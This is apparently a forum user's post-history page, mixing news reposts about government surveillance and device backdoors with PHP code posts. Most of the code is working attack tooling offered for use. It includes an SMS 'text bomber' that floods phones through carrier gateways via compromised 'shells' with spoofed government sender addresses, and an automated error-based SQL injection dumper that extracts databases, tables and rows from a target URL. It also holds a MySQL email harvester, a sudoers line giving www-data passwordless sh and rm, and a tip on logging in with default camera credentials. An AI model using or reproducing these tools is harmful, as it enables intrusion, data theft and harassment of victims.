Aerosol
-
Posts
3453 -
Joined
-
Last visited
-
Days Won
22
Everything posted by Aerosol
-
Recent revelations about government-backed surveillance have prompted millions of people to do more to keep their data private, suggests a survey. Many people now regularly change passwords or avoid certain websites or apps, said the Centre for International Governance Innovation (CIGI). It also found that 64% of the 23,000 people questioned are more worried about their privacy than a year ago. About 83% said affordable access to the internet should be a human right. The survey asked people in 24 countries including the US, UK, Australia and China, about their attitudes to personal data privacy and whether the information released by Edward Snowden had led them to change their habits. The survey revealed that Mr Snowden's name was known to 60% of respondents and of that group, 39% had done more to protect their privacy in response to the information his leaks have revealed. Of those, compared with a year ago, more than one-third were updating their passwords more frequently and 43% were taking greater steps to avoid websites and software that might put their data at risk. 'Enormous impact' The CIGI think tank undertook the survey as part of work for the Global Commission on Internet Governance which is looking into the different ways that the net can be overseen and run. In a separate analysis of the CIGI survey, security expert Bruce Schneier, said the information about NSA and GCHQ surveillance programs was having an "enormous impact" on people's behaviour. The CIGI figures suggest, he said, that more than 750 million people around the world have been prompted to take steps to avoid being watched by the NSA. He added it was likely that the steps that people did take made little difference to the NSA's ability to gather data on them or to defy the surveillance techniques of large firms. "But it is absolutely extraordinary that 750 million people are disturbed enough about their online privacy that they will represent to a survey-taker that they did something about it," he said. Source
-
A US Senator is urging Congress to pass laws forbidding Uncle Sam's spies from forcing software and hardware makers to build backdoors. In an op-ed posted in the LA Times, Sen. Ron Wyden (D-OR) said that there was no safe way to build backdoors into phones, tablets, computers and software without exposing them to hackers to exploit. Wyden, who this month proposed a bill to ban government agencies from mandating backdoors, noted the mechanisms US agencies want to use for law enforcement and intelligence will double as open invitations for foreign agencies and criminals to pwn devices. "The problem with this logic is that building a back door into every cellphone, tablet, or laptop means deliberately creating weaknesses that hackers and foreign governments can exploit," Wyden wrote. "Mandating back doors also removes the incentive for companies to develop more secure products at the time people need them most; if you're building a wall with a hole in it, how much are you going invest in locks and barbed wire?" Mandatory backdoors in devices and code are a hot topic: g-men argue that being able to tunnel into devices is essential to saving lives by detecting and preventing crime. Privacy advocates, meanwhile, have argued that the tools are a violation of privacy and a major security threat. Put Senator Wyden firmly in the latter category. He notes that even the government agencies themselves have proven less-than-trustworthy when it comes to handling data collected from citizen devices. "For years, officials of intelligence agencies like the NSA, as well as the Department of Justice, made misleading and outright inaccurate statements to Congress about data surveillance programs — not once, but repeatedly for over a decade," he said. "These agencies spied on huge numbers of law-abiding Americans, and their dragnet surveillance of Americans' data did not make our country safer." Source
-
nu se chinuie sa schimbe parola nici cei care cumpara si nici cei care monteaza camera... am avut acum 1 saptamana un caz asemanator ( un prieten ce are magazin a fost furat si vroia sa vada inregistrarile toate bune doar ca nu stia datele si cum eram in zona am zis sa-l ajut. am bagat la user: admin si la pass: 12345 (user si pass default) si surpriza a mers) asa ca de multe ori cei care iti monteaza sistemul nici nu se obosesc sa schimbe datele...
-
Permissions for www-data user www-data ALL=(ALL) NOPASSWD: /usr/bin/crontab, /bin/mv, /bin/sh, /bin/cp, /bin/rm, /usr/bin/php function createCronJob($min,$hour,$dayofMonth,$month,$dayOfweek,$command,$commented) { $realpath_var = realpath(__FILE__); $realpath_arr = explode('/',$realpath_var); $FullPathRoot = "/".$realpath_arr[1]."/".$realpath_arr[2]."/".$realpath_arr[3]; if($commented!="") { $commented="#"; } if($min=="") { $min="*"; } if($hour=="") { $hour="*"; } if($dayofMonth=="") { $dayofMonth="*"; } if($month=="") { $month="*"; } if($dayOfweek=="") { $dayOfweek="*"; } $CronJobs = shell_exec("sudo crontab -l"); $CronJobs_arr= explode("#***\n",$CronJobs) or die("ERROR"); $CronJobs_arr = array_filter($CronJobs_arr); $NewCron = $CronJobs_arr[0]."#***\n"; if($command!="") { $command_file = "#!/bin/bash\n"; $command_file.= $command."\n\n"; $command_file.= 'echo '.'"Scheduled Backup: Backup performed at '.'`date '."'+%d-%m-%Y %H:%M:%S'`".'\n<br/>---------------------------------------------------------------------------------\n" >> '.$FullPathRoot."/logSchedule/".date("Y-m-d").".log" ; file_put_contents($FullPathRoot."/bash/ExecCron.sh",$command_file); $NewCron.= $commented.$min." ".$hour." ".$dayofMonth." ".$month." ".$dayOfweek."\t".$FullPathRoot."/bash/ExecCron.sh"."\r\n#***\n"; } $file = $FullPathRoot."/InstallNewCron.txt"; file_put_contents($file,$NewCron); $ClearCronJob = shell_exec("sudo crontab -r"); $reinstall_cronJob = shell_exec("sudo crontab ".$file); unlink($file); $Body="The Original Cronjob was changed \n\n\nOriginal:\n\n****************\n\n".$CronJobs."\n****************\n\n\nModfied To:\n\n".$NewCron."\n\n"; return $Body }
-
Sendtext.php $from = 'From: '.$_GET['from']; $number = $_GET['number']; $message = $_GET['message']; $country = $_GET['country']; function SendSMS($var1, $var2, $var3, $var4, $var5) { if($var5) { $formatted_number = $var5.$var1.var4; } else { $formatted_number = $var1.$var4; } mail($formatted_number, "", $var2,$var3); } if (!isset($number) or !isset($message) or !isset($from) or !isset($country)) { die("Not Sent"); } switch($country) { case "australia": //T-Mobile/Optus Zoo SendSMS($number, $message, $from, "@optusmobile.com.au", "0"); echo("Sent"); break; case "austria": //T-Mobile SendSMS($number, $message, $from, "@sms.t-mobile.at", "43676"); echo("Sent"); break; case "unitedstates": //Verizon SendSMS($number, $message, $from, "@vtext.com", NULL); //Tmobile SendSMS($number, $message, $from, "@tomomail.net", NULL); //Sprint SendSMS($number, $message, $from, "@messaging.sprintpcs.com", NULL); //AT&T SendSMS($number, $message, $from, "@txt.att.net", NULL); //Vergin Mobile SendSMS($number, $message, $from, "@vmobl.com", NULL); //Metro PCS SendSMS($number, $message, $from, "@mymetropcs.com", NULL); //Cricket SendSMS($number, $message, $from, "@sms.mycricket.com", NULL); //Myboost Mobile SendSMS($number, $message, $from, "@myboostmobile.com", NULL); //BellSouth SendSMS($number, $message, $from, "@bellsouth.cl", NULL); //Alaska Communications SendSMS($number, $message, $from, "@msg.acsalaska.com", NULL); //Ameritech SendSMS($number, $message, $from, "@paging.acswireless.com", NULL); //Alltel SendSMS($number, $message, $from, "@message.alltel.com", NULL); //CelularOne SendSMS($number, $message, $from, "@mobile.celloneusa.com", NULL); //CelularOne MMS SendSMS($number, $message, $from, "@mms.uscc.net", NULL); //Cingular SendSMS($number, $message, $from, "@mobile.mycingular.com", NULL); //Edge Wireless SendSMS($number, $message, $from, "@sms.edgewireless.com", NULL); //Nextel SendSMS($number, $message, $from, "@messaging.nextel.com", NULL); //O2 - Orange SendSMS($number, $message, $from, "@mobile.celloneusa.com", NULL); //Qwest SendSMS($number, $message, $from, "@qwestmp.com", NULL); //Rogers Wireless SendSMS($number, $message, $from, "@pcs.rogers.com", NULL); //Telus Mobility SendSMS($number, $message, $from, "@msg.telus.com", NULL); //US Celular SendSMS($number, $message, $from, "@email.uscc.net", NULL); echo("Sent"); break; case "unitedkingdom": //OS #1 SendSMS($number, $message, $from, "@mobile.celloneusa.com", "44"); //OS #2 SendSMS($number, $message, $from, "@mmail.co.uk", "44"); //Orange SendSMS($number, $message, $from, "@orange.net", "0"); //T-Mobile SendSMS($number, $message, $from, "@t-mobile.uk.net", "0"); //Vergin Mobile SendSMS($number, $message, $from, "@vxtras.com", "0"); //Vodafone SendSMS($number, $message, $from, "@vodafone.net", "0"); echo("Sent"); break; case "germany": //T-Mobile SendSMS($number, $message, $from, "@t-d1-sms.de", "0"); //Vodafone SendSMS($number, $message, $from, "@vodafone-sms.de", "0"); //O2 SendSMS($number, $message, $from, "@o2online.de", "0"); echo("Sent"); break; case "ireland": //E-Plus SendSMS($number, $message, $from, "@smsmail.eplus.de", "0"); //Metor SendSMS($number, $message, $from, "@sms.mymeteor.ie", NULL); echo("Sent"); break; case "india": //Andhra Pradesh AirTel SendSMS($number, $message, $from, "@airtelap.com", "91"); //Andhra Pradesh Idea Cellular SendSMS($number, $message, $from, "@ideacellular.net", "9848"); //Chennai Skycell / Airtel SendSMS($number, $message, $from, "@airtelchennai.com", "919840"); //Chennai RPG Cellular SendSMS($number, $message, $from, "@rpgmail.net", "9841"); //Delhi Airtel SendSMS($number, $message, $from, "@airtelmail.com", "919810"); //Delhi Hutch SendSMS($number, $message, $from, "@delhi.hutch.co.in", "9811"); //Gujarat Idea Cellular SendSMS($number, $message, $from, "@ideacellular.net", "9824"); //Gujarat Airtel SendSMS($number, $message, $from, "@airtelmail.com", "919898"); //Gujarat Celforce / Fascel SendSMS($number, $message, $from, "@celforce.com", "9824"); //Goa Airtel SendSMS($number, $message, $from, "@airtelmail.com", "919890"); //Goa BPL Mobile SendSMS($number, $message, $from, "@bplmobile.com", "9823"); //Goa Idea Cellular SendSMS($number, $message, $from, "@ideacellular.net", "9822"); //Haryana Airtel SendSMS($number, $message, $from, "@airtelmail.com", "919896"); //Haryana Escotel SendSMS($number, $message, $from, "@escotelmobile.com", "9812"); //Himachal Pradesh Airtel SendSMS($number, $message, $from, "@airtelmail.com", "919816"); //Karnataka Airtel SendSMS($number, $message, $from, "@airtelkk.com", "919845"); //Kerala Airtel SendSMS($number, $message, $from, "@airtelkerala.com", "919895"); //Kerala Escotel SendSMS($number, $message, $from, "@escotelmobile.com", "9847"); //Kerala BPL Mobile SendSMS($number, $message, $from, "@bplmobile.com", "9846"); //Kolkata Airtel SendSMS($number, $message, $from, "@airtelkol.com", "919831"); //Madhya Pradesh Airtel SendSMS($number, $message, $from, "@airtelmail.com", "919893"); //Maharashtra Airtel SendSMS($number, $message, $from, "@airtelmail.com", "919890"); //Maharashtra BPL Mobile SendSMS($number, $message, $from, "@bplmobile.com", "9823"); //Maharashtra Idea Cellular SendSMS($number, $message, $from, "@ideacellular.net", "9822"); //Mumbai Airtel SendSMS($number, $message, $from, "@airtelmail.com", "919892"); //Mumbai BPL Mobile SendSMS($number, $message, $from, "@bplmobile.com", "9821"); //Punjab Airtel SendSMS($number, $message, $from, "@airtelmail.com", "919815"); //Pondicherry BPL Mobile SendSMS($number, $message, $from, "@bplmobile.com", "9843"); //Tamil Nadu Airtel SendSMS($number, $message, $from, "@airtelmail.com", "919894"); //Tamil Nadu BPL Mobile SendSMS($number, $message, $from, "@bplmobile.com", "919843"); //Tamil Nadu Aircel SendSMS($number, $message, $from, "@airsms.com", "9842"); //Uttar Pradesh West Escotel SendSMS($number, $message, $from, "@escotelmobile.com", "9837"); echo("Sent"); break; case "canada": // Aliant SendSMS($number, $message, $from, "@wirefree.informe.ca", NULL); //Bell Mobility SendSMS($number, $message, $from, "@txt.bellmobility.ca", NULL); //Fido SendSMS($number, $message, $from, "@fido.ca", NULL); //MTS Mobility SendSMS($number, $message, $from, "@text.mtsmobility.com", NULL); //Rogers Wireless SendSMS($number, $message, $from, "@pcs.rogers.com", NULL); //Sasktel Mobility SendSMS($number, $message, $from, "@pcs.sasktelmobility.com", NULL); //Telus SendSMS($number, $message, $from, "@msg.telus.com", NULL); //Virgin Mobile SendSMS($number, $message, $from, "@vmobile.ca", NULL); //President's Choice SendSMS($number, $message, $from, "@mobiletxt.ca", NULL); echo("Sent"); break; } ?> Has support for multiple carriers as well as multiple countries built in. Add more if you want... If you want to make your own text bomber from this: hub.php <?php ignore_user_abort(FALSE); if(!isset($_GET['message'])) { die(); } if(!isset($_GET['number'])) { die(); } if(!isset($_GET['country'])) { die(); } $exec_time = 5; $time = time(); $max_time = $time+$exec_time; $message = str_replace(" ", "+", $_GET['message']); $number = $_GET['number']; $country = $_GET['country']; function MultiRequest($nodes) { $time = time(); $maxtime = $time + 25; $node_count = count($nodes); $curl_arr = array(); $master = curl_multi_init(); $texts = 0; for($i = 0;$i < $node_count;$i++) { $url = $nodes[$i]; $curl_arr[$i] = curl_init($url); curl_setopt($curl_arr[$i], CURLOPT_RETURNTRANSFER, true); curl_multi_add_handle($master, $curl_arr[$i]); } do { if(time() > $maxtime) { break; } curl_multi_exec($master,$running); } while($running > 0); } $sender_array = array(); $file = fopen("shells.txt","r"); while(!feof($file)) { $sender_array[] = fgets($file,filesize("shells.txt")); } fclose($file); $aol = count($sender_array, COUNT_RECURSIVE)-1; $nodes = array(); while(1) { if(time() > $max_time) { break; } $froms = array('@gmail.com', '@SPAM.net', '@hotmail.com', '@googlemail.com', '@fbi.gov', '@cia.gov', '@whitehouse.gov', '@txt-bomb.com', '@steampowered.com', '@tf2.com', '@love.com', '@umad.com', '@nop.com', '@troll.com', '@facebook.com', '@google.com'); $server = $sender_array[rand(0,$aol)]; $server = preg_replace('!\r?\n!', '', $server); $params = "?file=".$_GET['file']."&number=".$number."&message=".$message."&country=".$country."&from=".rand(0,9999).$froms[rand(0,17)]; $nodes[] = $server.$params; usleep(5000); } print_r($nodes); MultiRequest($nodes); ?> Also, create shells.txt and just create links to wherever you upload the SMS sending script. Credits to: Hellix
-
Doar copiezi si apoi adaugi in public_html index.php <?php session_start(); if ( isset( $_POST['submit'] ) ) { $code = strip_tags( $_POST['code'] ); $real_code = $_SESSION['captcha_code']; if ( $code !== $real_code ) { echo "Wrong code! Code was {$real_code}"; } else { echo "Correct code!"; } } else { ?> <form method="post"> <img src="captcha.php" /><br /> Enter code: <input type="text" name="code" /> <input type="submit" name="submit" value="Go" /> </form> <?php } ?> captcha.php <?php /* This tutorial will teach you how to create your own Captcha image. */ session_start(); $chars = "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM"; $length = ( isset( $_GET['l'] ) && is_numeric( $_GET['l'] ) ) ? (int)$_GET['l'] : 8; $captcha = ""; for ( $i = 1; $i <= $length; $i++ ) { $captcha .= $chars[ mt_rand( 0, strlen( $chars ) ) ]; } $_SESSION['captcha_code'] = $captcha; $width = ( $length * 10 ) - 3; $img = imagecreate( $width, 17 ); $bg = imagecolorallocate( $img, 0, 0, 0 ); //black $txt = imagecolorallocate( $img, 255, 255, 255 ); //white imagestring( $img, 5, 3, 1, $captcha, $txt ); header( "Content-Type: image/PNG" ); imagepng( $img ); imagedestroy( $img ); ?>
-
http://uppix.com/f-shellfinder153b423d90016e81b.jpg http://uppix.com/f-shellfinder253b424050016e81e.jpg <style> #sbz {text-align: center;color: #000;font-size: 30px;font-weight: bold;line-height: 0.8em;letter-spacing: 0.2em;margin:0;text-shadow: 0 1px 20px #00FF00, 0 0 5px #00FF00, 0 0px 30px #00FF00, 1px 0 3px #00FF00;} span.tab{padding: 0 10px; } .box{ -moz-box-shadow: 1px 1px 8px #666; -webkit-box-shadow: 1px 1px 8px #666; box-shadow: 1px 1px 8px #40D5D2; border: solid 1px black; -webkit-border-radius: 8px 8px 0px 0px; -moz-border-radius: 8px 8px 0px 0px; border-radius: 8px 8px 0px 0px; margin: 15px 0px; background-color: #F5F5F5; opacity: 0.8; width:840px; } #footer { position : absolute; bottom : 0; height : 40px; margin-top : 40px; } body{ background-color: black; background: url('http://images7.alphacoders.com/332/332232.jpg') no-repeat center center fixed; } </style> <?php @set_time_limit(0);error_reporting(0); function recurseDir($dir,$list) { if(is_dir($dir)) { if($dh = opendir($dir)){ while($file = readdir($dh)){ if($file != '.' && $file != '..'){ if(is_dir($dir . '/' . $file)){ $list = recurseDir($dir .'/' . $file . '/',$list); }else{ $list[] = $dir . '/' . $file; } } } } closedir($dh); } return $list; } echo '<html><head><title>Shellfinder</title></head><body><center><pre id="sbz">Shellfinder by T3N38R15</pre><div class="box" align="left">'; if(empty($_POST["go"])==0){ $files = array(); $files = recurseDir($_POST["directory"],$files); echo '<table cellpadding="2"><tr><td>Path</td><td>Functions</td><td> Shell ?</td></tr>'; foreach($files as $file){ if($file!=getcwd() . $_SERVER["PHP_SELF"]){ $content=file_get_contents($file); if (preg_match('/(<\?php)/i',$content)){ if (preg_match('/(base64_\(|eval\s*\(|system\s*\(|shell_|exec\s*\(|move_uploaded_file\s*\(|gzinfl?ate\s*\()/i',$content)){ $ve1=0;$ve2=0;$ve3=0;$ve4=0;$ve5=0;$ve6=0; echo '<tr><td>'. $file . '</td><td>'; if (preg_match('/(base64_)/i',$content)){echo "base64 decoding/encoding,";$ve1=1;} if (preg_match('/(eval)/i',$content)){echo "eval,";$ve2=1;} if (preg_match('/(system)/i',$content)){echo "system,";$ve3=1;} if (preg_match('/(shell_)/i',$content)){echo "Shell_,";$ve4=1;} if (preg_match('/(move_uploaded_file)/i',$content)){echo "move_uploaded_file,";$ve5=1;} if (preg_match('/(gzinflate)/i',$content)){echo "gzinflate,";$ve6=1;} echo '</td><td>'; if(($ve1==1 && $ve2==1) || ($ve6==1 && $ve2==1)){ echo '<font color="red">possible shell 85%</font>'; }elseif($ve5==1){ echo '<font color="red">possible uploader 90%</font>'; }elseif($ve4==1){ echo '<font color="red">possible shell-Console 50%</font>'; }elseif($ve3==1){ echo '<font color="red">system-shell 50%</font>'; }else{ echo ' '; } echo '</td></tr>'; } } } } echo '</tr></table>'; }else{ echo '<center>To start the scanning press go.</br>this can took a bit of your time </br></br><form method="POST">scann : <input type="text" name="directory" value="' . $_SERVER["DOCUMENT_ROOT"] . '"/></br><input type="submit" name="go" value="GO"/></form></center>'; } echo '</div></center></body><div id="footer"><pre id="sbz">Team Madleets</pre></div></html>'; ?> Credit's to: T3N38R15
-
<style> #sbz {text-align: center;color: #000;font-size: 30px;font-weight: bold;line-height: 0.8em;letter-spacing: 0.2em;margin:0;text-shadow: 0 1px 20px #00FF00, 0 0 5px #00FF00, 0 0px 30px #00FF00, 1px 0 3px #00FF00;} span.tab{padding: 0 10px; } .box{ -moz-box-shadow: 1px 1px 8px #666; -webkit-box-shadow: 1px 1px 8px #666; box-shadow: 1px 1px 8px #40D5D2; border: solid 1px black; -webkit-border-radius: 8px 8px 0px 0px; -moz-border-radius: 8px 8px 0px 0px; border-radius: 8px 8px 0px 0px; margin: 15px 0px; background-color: #F5F5F5; opacity: 0.8; width:840px; } #footer { position : absolute; bottom : 0; height : 40px; margin-top : 40px; } body{ background-color: black; background: url('http://images7.alphacoders.com/332/332232.jpg') no-repeat center center fixed; } </style> <?php @set_time_limit(0);error_reporting(0); echo '<html><head><title>Email extractor</title></head><body><center><pre id="sbz">Email extractor by T3N38R15</pre><div class="box" align="left"><center>'; if(!empty($_GET["rm"])){unlink('emails.txt');echo '<script> alert("email file deleted");window.location="' . $_SERVER["PHP_SELF"] . '";</script>';} if(!empty($_POST["server"])){ $vr=false;if(!empty($_POST["filesf"])){if($_POST["filesf"]=="on"){$vr=true;}} if($vr==true){ignore_user_abort(true);$fh = fopen("emails.txt", 'w') or die("can't open file " . getcwd() . '/emails.txt');} mysql_connect($_POST["server"], $_POST["user"], $_POST["pw"]) OR die("not connected"); $res1 = mysql_query("SHOW DATABASES"); echo '<textarea style="width:98%;" rows="25">'; while ($row1 = mysql_fetch_assoc($res1)) { $res2 = mysql_query("SHOW TABLES FROM " . $row1['Database']); while ($row2 = mysql_fetch_assoc($res2)) { $res3 = mysql_query("SHOW COLUMNS FROM " . $row1['Database'] . "." . $row2['Tables_in_' . $row1['Database']]); while ($row3 = mysql_fetch_assoc($res3)) { if(strstr($row3['Field'], "email")) { $res4 = mysql_query("select " . $row3['Field'] ." FROM " . $row1['Database'] . "." . $row2['Tables_in_' . $row1['Database']]); while ($row4 = mysql_fetch_assoc($res4)) {if(!empty($row4[$row3['Field']])){if(strstr($row4[$row3['Field']], "@")){echo $row4[$row3['Field']] . "\n";if($vr==true){fwrite($fh, $row4[$row3['Field']] . "\n");}}}} } } } } echo '</textarea>'; if($vr==true){fclose($fh);echo '</br><a href="emails.txt">Here are your Emails</a><span style="padding: 0 20px;"></span><a href="' . $_SERVER["PHP_SELF"] . '?rm=1">Remove email File</a>';} }else{ echo '<form method="POST"><table><tr><td>Server : <input type="text" name="server" value="localhost"\></td></tr><tr><td>User : <input type="text" name="user" value="root"\></td></tr><tr><td>Password : <input type="text" name="pw" value=""\></td></tr><tr><td>Save-to-file : <input type="checkbox" name="filesf"\></td></tr><tr><td><input type="submit" value="send"\></td></tr></table></form>'; } echo '</center></div></center></body></html>'; ?> Credits to : T3N38R15
-
<?php ini_set('memory_limit', '64M');ignore_user_abort(true);set_time_limit(0); Zip($_SERVER['DOCUMENT_ROOT'],$_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . "backup-". time() .".zip"); echo "finish"; function Zip($source, $destination){ if (extension_loaded('zip') === true){ if (file_exists($source) === true){ $zip = new ZipArchive(); if ($zip->open($destination, ZIPARCHIVE::CREATE) === true){ $source = realpath($source); if (is_dir($source) === true){ $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file){ $file = realpath($file); if (is_dir($file) === true){ $zip->addEmptyDir(str_replace($source . DIRECTORY_SEPARATOR, '', $file . DIRECTORY_SEPARATOR)); }else if (is_file($file) === true){ $zip->addFromString(str_replace($source . DIRECTORY_SEPARATOR, '', $file), file_get_contents($file)); } } }else if (is_file($source) === true){ $zip->addFromString(basename($source), file_get_contents($source)); } } return $zip->close(); } } return false; } ?> it backup all files in the ROOTDIR into a backup-%time%.zip have fun with it. Credits to : T3N38R15
-
<?php @set_time_limit(0); if(empty($_POST)==0){ if(empty($_POST["opt1"])==0){ $Fd=false; $pb=array('1"','1' . chr(39),'1'); $_url = $_POST["url"]; foreach($pb as $zz){ $_buffer = LoadSite($_url . $zz, ""); if(preg_match("#You have an error in your SQL syntax#", $_buffer)){$Fd=true;break;} } if($Fd){ $seperator=''; foreach($pb as $zz){ $fg=$_url . $zz . '+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1+--+f+--+'; $_buffer=LoadSite($fg,""); if(preg_match("#Duplicate entry#",$_buffer)){$seperator=$zz;break;} } if($seperator==''){echo "NOTHING UP HERE";exit();} echo '<table><tr><td valign="top">'; $fg=$_url . $seperator . '+or+1+group+by+concat_ws(0x7e,version(),user(),database(),floor(rand(0)*2))+hav?ing+min(0)+or+1+--+f+--+'; $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, ""))); $_buffer1 = explode('~',$lde[1]); $version=$_buffer1[0];$user=$_buffer1[1];$database=$_buffer1[2]; echo "Version : " . $version . "</br>User : " . $user . "</br>database : " . $database; $fg=$_url . $seperator . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+distinct+Concat/*!50000*/(0x7e,0x27,count(schema_name),0x27,0x7e)+FROM+/*!information_schema.schemata*/+LIMIT+0,1))+FROM+/*!information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)a)+--+f+--+'; $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, ""))); $_buffer1 = explode('~',$lde[1]); $dbcount=$_buffer1[1]; echo '</br>DbCount : ' . $dbcount . '</br></td><td><table border="3"><tr><td>Databases : </td></tr>'; for ($i=0;$i<$dbcount; $i++){ echo '<tr><td><form name="dt' . $i . '" method="post" target="_blank" style="display:inline">'; $fg=$_url . $seperator . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+distinct+Concat/*!50000*/(0x7e,0x27,CONVERT/*!50000(schema_name+USING+utf8)*/,0x27,0x7e)+FROM+/*!information_schema.schemata*/+LIMIT+'.$i.',1))+FROM+/*!information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)a)+--+f+--+'; $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, ""))); $_buffer1 = explode('~',$lde[1]); echo '<div onclick="document.dt' . $i . '.submit()">' . $_buffer1[1] . '</div>'; echo '<input type="hidden" name="nameinbase" value="' . String2Hex($_buffer1[1]) . '">'; echo '<input type="hidden" name="url" value="' . $_url . '">'; echo '<input type="hidden" name="opt2" value="1">'; echo '<input type="hidden" name="seperator" value="'; switch($seperator){ case '1"':echo "1";break; case '1' . chr(39):echo "2";break; case '1':echo "3";break; } echo '"></form></td></tr>'; } echo "</table><td></tr></table>"; } }elseif(empty($_POST["opt2"])==0){ $_url = $_POST["url"]; $seperator = $_POST["seperator"]; $sepe=GetSeperatorByInteger($seperator); $fg=$_url . $sepe .'+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+concat+/*!50000*/(0x7e,0x27,count(table_name),0x27,0x7e)+FROM+/*!information_schema.tables*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'))+FROM+/*!information_schema.tables+LIMIT*/+0,1),floor(rand(0)*2))x+FROM/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+'; $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, ""))); $_buffer1 = explode('~',$lde[1]); $cta=$_buffer1[1]; echo '<table border="3"><tr><td>Tables From ' . Hex2String($_POST["nameinbase"]) . ' : (Total: '.$cta.') </td></tr>'; for ($i=0;$i<$cta; $i++){ echo '<tr><td><form name="dt' . $i . '" method="post" target="_blank" style="display:inline">'; $fg = $_url . $sepe . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+distinct+concat/*!50000*/(0x7e,0x27,CONVERT/*!50000(table_name+USING+utf8)*/,0x27,0x7e)+FROM+/*!information_schema.tables*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'+LIMIT+'.$i.',1))+FROM+/*!information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)a)+--+f+--+'; $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, ""))); $_buffer1 = explode('~',$lde[1]); echo '<div onclick="document.dt' . $i . '.submit()">' . $_buffer1[1] . '</div>'; echo '<input type="hidden" name="nameinbase" value="' . $_POST["nameinbase"] . '">'; echo '<input type="hidden" name="nameinbase2" value="' . String2Hex($_buffer1[1]) . '">'; echo '<input type="hidden" name="url" value="' . $_url . '">'; echo '<input type="hidden" name="opt3" value="1">'; echo '<input type="hidden" name="seperator" value="' . $seperator . '">'; echo "</form></td></tr>"; } }elseif(empty($_POST["opt3"])==0){ $_url = $_POST["url"]; $seperator = $_POST["seperator"]; $sepe=GetSeperatorByInteger($seperator); $fg = $_url . $sepe . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+concat+/*!50000*/(0x7e,0x27,count(column_name),0x27,0x7e)+FROM+/*!information_schema.columns*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'+AND+table_name=0x'.$_POST["nameinbase2"].'))+FROM+/*!information_schema.tables+LIMIT*/+0,1),floor(rand(0)*2))x+FROM/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+'; $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, ""))); $_buffer1 = explode('~',$lde[1]); $cta=$_buffer1[1]; echo '<table border="3"><tr><td>columns from ' . Hex2String($_POST["nameinbase2"]) . ' in Database ' . Hex2String($_POST["nameinbase"]) . ' (Total: '.$cta.')</td></tr>'; for ($i=0;$i<$cta; $i++){ echo '<tr><td><form name="dt' . $i . '" method="post" target="_blank" style="display:inline">'; $fg=$_url . $sepe . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(select+distinct+concat/*!50000*/(0x7e,0x27,CONVERT/*!50000+(column_name+USING+utf8)*/,0x27,0x7e)+FROM+/*!50000information_schema.columns*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'+AND+table_name=0x'.$_POST["nameinbase2"].'+LIMIT+'.$i.',1))+FROM+/*!50000information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+'; $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, ""))); $_buffer1 = explode("~",$lde[1]); echo '<div onclick="document.dt' . $i . '.submit()">' . $_buffer1[1] . '</div>'; echo '<input type="hidden" name="nameinbase" value="' . $_POST["nameinbase"] . '">'; echo '<input type="hidden" name="nameinbase2" value="' . $_POST["nameinbase2"] . '">'; echo '<input type="hidden" name="nameinbase3" value="' . String2Hex($_buffer1[1]) . '">'; echo '<input type="hidden" name="url" value="' . $_url . '">'; echo '<input type="hidden" name="opt4" value="1">'; echo '<input type="hidden" name="seperator" value="' . $seperator . '">'; echo "</form></td></tr>"; } echo '</table>'; }elseif(empty($_POST["opt4"])==0){ $_url = $_POST["url"]; $seperator = $_POST["seperator"]; $sepe=GetSeperatorByInteger($seperator); $fg = $_url . $sepe .'+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+concat+/*!50000*/(0x7e,0x27,count('.Hex2String($_POST["nameinbase3"]).'),0x27,0x7e)+FROM+'.Hex2String($_POST["nameinbase"]).'.'.Hex2String($_POST["nameinbase2"]).'))+FROM+/*!information_schema.tables+LIMIT*/+0,1),floor(rand(0)*2))x+FROM/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+'; $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, ""))); $_buffer1 = explode('~',$lde[1]); $cta=$_buffer1[1]; echo '<table border="3"><tr><td>Items : (Total: '.$_buffer1[1].')</td></tr>'; for ($i=0;$i<$cta; $i++){ $fg=$_url .$sepe . '+and+(select+1+FROM(select+count(*),concat/*!50000*/((select+concat/*!50000*/(0x7e,0x27,'.Hex2String($_POST["nameinbase3"]).',0x27,0x7e)+FROM+'.Hex2String($_POST["nameinbase"]).'.'.Hex2String($_POST["nameinbase2"]).'+LIMIT+'.$i.',1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)+--+f+--+'; $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, ""))); $_buffer1 = explode('~',$lde[1]); echo '<tr><td>' . $i . '</td><td>' . $_buffer1[1] . '</td></tr>'; } echo '</table'; } }else{ ?> <style type="text/css">#sbz {text-align: center;color: #000;font-size: 